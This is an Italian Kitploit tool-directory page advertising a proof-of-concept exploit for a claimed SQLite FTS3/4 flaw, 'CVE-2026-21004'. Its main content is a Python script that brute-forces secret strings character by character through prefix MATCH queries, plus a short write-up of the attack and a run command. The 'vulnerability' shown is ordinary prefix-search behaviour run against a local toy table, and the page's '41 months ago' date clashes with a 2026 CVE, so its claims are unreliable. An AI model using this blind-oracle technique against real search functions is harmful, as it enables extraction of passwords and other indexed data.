Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — Exploit proof-of-concept per CVE-2026-21004: usa query MATCH con prefissi FTS3/4 di SQLite appositamente create come oracolo cieco per recuperare dati segreti indicizzati carattere per carattere. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
Analisi delle VulnerabilitàExploitEsfiltrazione DatiSicurezza dei Database
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

Exploit proof-of-concept per CVE-2026-21004: usa query MATCH con prefissi FTS3/4 di SQLite appositamente create come oracolo cieco per recuperare dati segreti indicizzati carattere per carattere.

Vedi Repository
41 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-21004 – Perdita di informazioni Match in SQLite FTS3 tramite manipolazione delle query

Codice del programma (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – Perdita di informazioni Match in SQLite FTS3/4

Severity: High

Panoramica

Un'applicazione che utilizza SQLite FTS4 espone una funzione di ricerca che restituisce risultati basati su una query MATCH. Osservando se una corrispondenza avviene (o le differenze di temporizzazione), un attaccante può recuperare con un attacco di forza bruta il contenuto dell'indice full-text carattere per carattere, estraendo dati sensibili.

Dettagli sulla vulnerabilità

  • Tipo: Divulgazione di informazioni / Iniezione cieca
  • Impatto: Esfiltrazione di dati dalle colonne indicizzate.
  • Causa principale: L'operatore FTS MATCH supporta query con prefisso (term*), consentendo a un attaccante di eseguire un attacco a dizionario senza conoscere il termine completo.

Dimostrazione dell'exploit

Esegui l'exploit:

root@kitploit:~
python sqlite_fts_leak.py

Lo script recupera progressivamente il contenuto della tabella secrets.

Scarica lo strumento